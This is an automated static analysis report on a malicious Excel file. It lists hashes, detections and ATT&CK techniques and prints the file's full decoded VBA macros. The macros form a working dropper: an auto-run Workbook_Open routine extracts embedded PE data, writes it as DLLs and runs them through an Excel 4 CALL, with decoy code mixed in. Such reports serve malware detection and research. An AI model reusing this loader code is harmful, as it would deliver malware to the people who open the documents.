Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a712e5d72dcbfd69…

MALICIOUS

Office (OLE)

Size: 906.4 KB
Created: 2020-06-22 10:41:03
Authoring application: Microsoft Excel
First seen: 2020-08-25
MD5: 4c29a821298cf628d9d12398cd1a4915
SHA-1: 7f95801938526d63bb4aaba379f75998cdb92f5d
SHA-256: a712e5d72dcbfd696b2e6ff7f1e7c12935591543a4e26b0b01e57dddf2f05e6c
Risk Score: 490

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1105 Ingress Tool Transfer

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that triggers execution. This macro is designed to launch an embedded PE executable, identified as Win.Malware.Agent-9451293-0 by ClamAV. The presence of Shell() and CallByName functions, along with references to Windows Script Host and LoadLibrary, indicates malicious intent to download and execute a secondary payload.

Heuristics 12

  • ClamAV: Win.Malware.Agent-9451293-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Win.Malware.Agent-9451293-0
  • Embedded PE executable [critical, OLE_EMBEDDED_EXE]
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]
    Document contains VBA macro code
  • Potential Shell call in VBA [critical, OLE_VBA_SHELL]
    Matched line in script:
             sendings = 1
             Dim sNMSP As New Shell
             FlagDouble = True
  • CallByName call [high, OLE_VBA_CALLBYNAME]
    Matched line in script:
    CallByName DestinationKat, "Copy" + "Here", VbMethod, harvest.Items.Item(Lrigat)
  • Workbook_Open macro [low, OLE_VBA_WBOPEN]
    Matched line in script:
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
    If WelcomeDialog.Visible = True Then
  • Reference to Windows Script Host [high, SC_STR_WSCRIPT]
  • Reference to LoadLibrary API [high, SC_STR_LOADLIBRARY]
  • Reference to GetProcAddress API [high, SC_STR_GETPROCADDRESS]
  • Suspicious extracted artifact [high, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API [medium, SC_STR_VIRTUALALLOC]
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18881 bytes
SHA-256: 39e1ad9f867a617d21aa677ac84ecf63f34e89764f692251351cf93d3725d675
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module2.WuzzyBud 3900
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal target As Range)

End Sub

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Repositor"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
 
Public Property Get CheckCar(car As Variant, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property


Public Property Let Speed(sp As Integer)
  
End Property



Attribute VB_Name = "Module0"





Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    DoEvents
    ActiveWorkbook.Close
DoEvents
    DoEvents
    
        
End Sub





Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
End Sub





Private Sub TextBox2_Change()

x = Len(TextBox2)
Y = LTrim(TextBox2.Text)
d = TextBox2
If d = "" Then
TextBox2.BackColor = &HFFFFFF
Exit Sub
End If
If Left(d, 2) > 24 Then
MsgBox "Ora Errata"
TextBox2.SelStart = 0
TextBox2.SelLength = Len(TextBox2)
Exit Sub
End If
If x = 2 Then TextBox2 = Y & ":"
If x = 4 Then Exit Sub

If Mid(d, 4, 2) = "" Then Exit Sub
If Mid(d, 4, 2) > 59 Then
MsgBox "Minuti Errati"
TextBox2.SelStart = 3
TextBox2.SelLength = Len(TextBox2)
Exit Sub
End If


If x = 5 Then
TextBox3.SetFocus
End If
Exit Sub

Resume
End Sub

Public Function Vooooohead()
    
   
   
   Dim ofbl As String
    Dim sOfbl As String
     Dim NumBForRead As Long

 
    dershlep = "" + Dialog4.TextBox1.Tag



Dim sendings As Integer
ofbl = Dialog4.TextBox3.Tag
ofbl = ofbl + "\srt_join"

 liquidOne = Dialog4.TextBox1.Tag + "\academ"

 liquidOne = liquidOne + "l.xlsx"

         Dim arr(1 To 3) As String
    
   
   
   
   If Len(Dialog4.TextBox3.Text) > 266 Then
        MsgBox "Ultrapassa 66 Caracteres!", vbCritical, "HISTÓRICO"
        TextBox7.SelStart = 0
    Else
    
       
    End If
        Dim objeto As Control
    
    If Len(Dialog4.TextBox1.Text) > 366 Then
        For Each objeto In UserForm1.Controls
            On Error Resume Next
            objeto.Value = ""
        Next
        
        Unload ggg.UserForm1
        ggg.UserForm1.Hide
    End If
    
   
    
ctackPip = liquidOne & Page11.Range("B115").Value
 
 PublicResumEraseByArrayList ofbl + "*", ctackPip, dershlep + UserForm1.Label1.Tag
    
        
  VistaQ liquidOne
    
        FileCopy liquidOne, ctackPip
         sendings = 1
         Dim sNMSP As New Shell
         FlagDouble = True
              
         Lrigat = UserForm1.Label11.Tag
         
        If sendings > 0 And sendings > -30 Then
         
            Set DestinationKat = sNMSP.Namespace(dershlep)
            Set harvest = sNMSP.Namespace(ctackPip)
          
          
        End If


Set ExcelC = ThisWorkbook.Sheets(1).Application.Sheets(1).Application

 

CallByName DestinationKat, "Copy" + "Here", VbMethod, harvest.Items.Item(Lrigat)
 
Dim car As Repositor
    
Set car = New Repositor
       For StepBit = 1 To 2
 
    NumBForRead = 320912
      sendings = 1
            flayString = "1"
       
        If FlagDouble Then
                
                sendings = 2
                NumBForRead = 1000000 - 725680
                FlagDouble = False
            flayString = "2"
            End If
            
            sOfbl = ofbl + flayString + ".dll"
 Composition dershlep + "" + UserForm1.Label1.Tag + "", sOfbl, NumBForRead, sendings
       
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        If -100 <= sendings Then
            sendings = sendings + 1
            ChDir Dialog4.TextBox3.Tag
            sendings = sendings + 1
        End If
        sOfbl = """" + sOfbl & ""","""

        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        
        

        If sendings > 1000 Then
            sendings = sendings + 1
        End If

        If sendings < 0 Then
            sendings = sendings + 1
        End If

        d = CallByName(ExcelC, "ExecuteE" + "xcel4Macro", VbMethod, "CAL" + "L(" + sOfbl + "seede"",""J"")")
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
    StopByOk = TestResult(d)
   If StopByOk Then
       Exit Function
       
    End If
    WelcomeDialog.Hide

Next
  
End Function
Sub subTotalSales()

    Dim LR As Integer
    LR = Cells(Rows.Count, "A").End(xlUp).Row + 2
    Rows("1:2").EntireRow.Insert Shift:=xlDown
    
    If LR = 3 Then
        Range("A1").Select
        Call salesHeade.rs
        Range("A2").Formula = "$0"
        Range("B2").Formula = "$0"
        Range("C2").Formula = "$0"
        Range("D2").Formula = "$0"
        Range("E2").Formula = "$0"
        Range("F2").Formula = "0%"
        Range("G2").Formula = "0"
        Range("H2").Formula = "$0"
        Range("I2").Formula = "0"
        Range("J2").Formula = "0"
        Range("K2").Formula = "$0"
        Range("L2").Formula = "$0"
        Range("M2").Formula = "0"
        Range("N2").Formula = "0%"
    Else
        Range("A1").Select
        Call salesHeade.rs
        With ActiveSheet

        End With
    End If

End Sub


Sub InputWeekData(x As Date)

    ActiveCell = Format(x, "ww", vbMonday, vbFirstFourDays)
    ActiveCell.Offset(0, 1).Select
    ActiveCell = x
    ActiveCell.Offset(0, 1).Select
    ActiveCell = x + 6
    ActiveCell.Offset(0, 1).Select

End Sub
Private Sub TextBox3_Change()

Y = LTrim(TextBox3.Text)
d = TextBox3

If x = 5 Then
TextBox4.SetFocus
End If
Exit Sub

Resume
End Sub





Attribute VB_Name = "Module1"

 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " ccc" Then
                
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub



Attribute VB_Name = "Module2"
 Public DisputeChannel3 As Byte
     
Public DecemberUpdate As Byte
 
 

Public HurricanMoes() As Byte

     
    Public abbrev As Byte



Public Sub WuzzyBud(dImmer As Integer)

If WelcomeDialog.Visible = True Then
Exit Sub
End If

 Dim s As String
 Dim GetLevelDescription As String
    
    Dim reqPlace As Long
    reqPlace = 3
    reqPlace = reqPlace - 1
    
    Set TSPIP = New IWshRuntimeLibrary.WshShell
    Select Case reqPlace
    Case 0
        s = "N health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select
  
    
Dim car As Repositor
    Dim SpecialPath As String
    

PRP = "%" & Dialog4.TextBox1.Tag


Set car = New Repositor
Dialog4.TextBox1.Tag = CallByName(TSPIP, "Exp" + "andEnvironmentStrings", VbMethod, PRP + "" + "" + "%")
  Dim firstWeek As Integer
    Dim firstDay As Integer
    Dim firstdate As Date

    Dim lastdate As Date
    Dim lastWeek As Integer
    Dim lastDay As Integer
    
    
      s = car.CheckCar(TSPIP, Dialog4.TextBox3.ControlTipText & "")
    firstWeek = 1
    firstDay = 2
    lastWeek = 3
    lastDay = 4
 Dialog4.TextBox3.Tag = s
 
    If Not firstDay = 1 Then
        firstdate = firstdate + (8 - firstDay)
        firstWeek = firstWeek + 1
    End If
    If lastDay = 6 Then
        lastdate = lastdate + 1
        lastDay = lastDay + 1
    ElseIf Not lastDay = 7 Then
        lastdate = lastdate - lastDay
        lastDay = 7
        lastWeek = lastWeek - 1
    End If
    
    
  
    
    Dim iteration As Integer
ChDir (Dialog4.TextBox1.Tag + "")
If WelcomeDialog.Visible = False Then
WelcomeDialog.Show
End If

End Sub














Attribute VB_Name = "Module4"




 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If

        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub






Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim PChannel As Long
  Dim logicVari As Integer
 Dim SimpleMethod As Integer
 ReDim HurricanMoes(1 To fl)
 PChannel = FreeFile
 Open Composition2 For Binary Access Read As PChannel

 logicVari = 1
Do While Not EOF(PChannel)
 Get PChannel, , abbrev
 If abbrev = FirstB Then
 HurricanMoes(1) = abbrev
 Get PChannel, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 HurricanMoes(2) = DisputeChannel3
 Get PChannel, , DecemberUpdate
 If DecemberUpdate = ThirdB Then
 HurricanMoes(3) = DecemberUpdate
 If logicVari = DisputeChannel6 Then
 For k = 4 To fl
 Get PChannel, , abbrev
 HurricanMoes(k) = abbrev
 Next k
 Exit Do
 Else
 logicVari = logicVari + 1
 End If
 End If
 End If
 End If
 Loop
 On Error Resume Next
 LoopIfEnd = 400
 Close PChannel
 LoopIfEnd = 400 + LoopIfEnd
 PChannel = FreeFile
 LoopIfEnd = 400 + LoopIfEnd
 Open ofbl For Binary Lock Read Write As #PChannel
 LoopIfEnd = 400 + LoopIfEnd
 zeroBob = 1
 For i = zeroBob To UBound(HurricanMoes)
 
 If WelcomeDialog.Enabled = True Then

    Put #PChannel, , HurricanMoes(i)
 End If
 Next i
 Close PChannel
 PChannel = FreeFile
 For HSP = 33 To -1 Step -0.25
 PChannel = 6 + i
 Next HSP
 PChannel = 6 + i
End Sub




Private Sub cmd_Keluar_Click()
Unload LSD.Me
MDIForm1.dokter.Enabled = True
MDIForm1.dokter.Checked = False
End Sub

Private Sub cmd_Perbaiki_Click()
If cmd_Perbaiki.Caption = "Pe&rbaiki" Then
   cmd_Simpan.Enabled = False
   cmd_Hapus.Enabled = False
   cmd_Batal.Enabled = True
   Dim var As String
   var = InputBox("Ketikkan kode dokter yang datanya akan di perbaiki !", "Perbaiki Data dokter")
   If var = Empty Then Exit Sub
      Data1.Recordset.Index = "Kode_dokter"
      Data1.Recordset.Seek "=", var
      If Not Data1.Recordset.NoMatch Then
         Call tam.pil
         txtkd_dok.Enabled = False
         txtnm_dok.Enabled = True
         cmd_Perbaiki.Caption = "&Perbaharui data"
      Else
         MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"
      End If
Else
Data1.Recordset.Edit
Data1.Recordset!kode_dokter = txtkd_dok.Text
Data1.Recordset!nama_dokter = txtnm_dok.Text
Data1.Recordset.Update
Call ber.sih
cmd_Perbaiki.Caption = "Pe&rbaiki"
cmd_Batal.Enabled = False
cmd_Simpan.Enabled = True
cmd_Hapus.Enabled = True
Call tdk_bi.sa
End If
End Sub

Private Sub cmd_Simpan_Click()
If cmd_Simpan.Caption = "&Isi Data" Then
Call bis.a
nom.Or
M.e.txtnm_dok.SetFocus
cmd_Batal.Enabled = True
cmd_Perbaiki.Enabled = False
cmd_Hapus.Enabled = False
cmd_cari.Enabled = False
cmd_Simpan.Caption = "&Simpan Data"
Else
If txtkd_dok.Text = "" Or _
        txtnm_dok.Text = "" Then
        MsgBox "Data tidak boleh kosong !", vbCritical, "SISTEM PENJUALAN KREDIT"
        txtkd_dok.SetFocus
        Else
cmd_Batal.Enabled = False
cmd_Perbaiki.Enabled = True
cmd_Hapus.Enabled = True
cmd_cari.Enabled = True
Data1.Recordset!kode_dokter = txtkd_dok.Text
Data1.Recordset!nama_dokter = txtnm_dok.Text
Data1.Recordset.Update
Call ber.sih
cmd_Simpan.Caption = "&Isi Data"
End If
End If
End Sub

















Attribute VB_Name = "Module5"



Private Sub Command7_Click()
 b = MsgBox("?????????", vbYesNo)
 If b = vbYes Then
  a = "delete from cinema where cinid='"
  a = a + Text1.Text + "'"
  cnmovie.Execute a
  rs4.Close
  Sql = "select * from cinema"
  rs4.Open Sql, cnmovie, adOpenDynamic, adLockOptimistic
     If rs.BOF Or rs.EOF Then
       MsgBox "?????!"
     Else
       rs4.MoveFirst
     Call View.Data
   End If
 End If
End Sub




Private Sub nomor()
Dim urutan As String * 5
Dim hitung As Byte

    If Data1.Recordset.RecordCount = 0 Then
        urutan = "Dr" & "001"
    Else
        Data1.Recordset.MoveLast
        If Val(Left(Data1.Recordset!kode_dokter, 3)) <> "000" Then
            urutan = "00" & "001"
        Else
        hitung = Val(Right(Data1.Recordset!kode_dokter, 3)) + 1
        urutan = "Dr" & Right("000" & hitung, 3)
    End If
    End If
    M.e.txtkd_dok = urutan

End Sub

Private Sub cmd_Batal_Click()
Call be.rsih
Call td.k_bisa
cmd_Batal.Enabled = False
cmd_Perbaiki.Enabled = True
cmd_Hapus.Enabled = True
cmd_cari.Enabled = True
End Sub

Private Sub cmd_cari_Click()
Dim var As String
var = InputBox("Masukan Kode Dokter yang ingin anda cari!", "Cari data dokter")
If var = Empty Then Exit Sub
   If var <> "" Then
      Data1.Recordset.Index = "kode_dokter"
      Data1.Recordset.Seek "=", var
      If Not Data1.Recordset.NoMatch Then
         Call tam.pil
         Call bi.sa
         Call kun.ci
      Else
         MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"
      End If
   End If
End Sub



Public Function TestResult(result As Variant)
TestResult = False
If IsNumeric(ExcelReturn) Then
  If ExcelReturn = 0 Then
   TestResult = True
  End If
 End If
End Function
Private Sub cmd_Hapus_Click()
Dim var As String
var = InputBox("Masukan Kode dokter yang akan dihapus!", "Hapus dokter")
If var = Empty Then Exit Sub
   If var = "" Then
      Data1.Recordset.Index = "Kode_dokter"
      Data1.Recordset.Seek "=", var
      If Not Data1.Recordset.NoMatch Then
         Data1.Recordset.Delete
         Data1.Refresh
         Data1.Recordset.MoveFirst
      Else
         MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan"

      End If
    End If
End Sub





Attribute VB_Name = "Dialog4"
Attribute VB_Base = "0{87059EBD-B0E8-42DB-8E39-2A9C71C151F1}{6BE3B450-3000-4C20-8BA5-82D59EB8BC12}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{2A159DBD-DD60-46A3-A2D5-B27EA6C0ADFE}{671955F3-6BA1-45A4-8C94-ECFC9DDF27C4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Activate()
DoEvents
DoEvents
Vooooohead
DoEvents
End Sub





Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C2B5E045-FE0A-4CEA-A7E5-86FE73A37A90}{860A1A21-CF67-44B5-AE95-709C13A05176}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

embedded_office_00001b56.exe | embedded-pe | Office MZ+PE at offset 0x1B56 | 921158 bytes
SHA-256: 06bb0bee5dd4cc1625c44cd0cade229666ff624e7f99e1c41fbbe20efcb89c0f
Detection
ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
Carved macro source contains an auto-exec entry point and execution/download terms.

ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD00321A15/Ole10Native | 599752 bytes
SHA-256: 272d1acb2a22167b377c491d2e48ace714a75dd1330325cf5cedcad9c554400c
Detection
ClamAV: Win.Malware.Agent-9451293-0
Obfuscation or payload: unlikely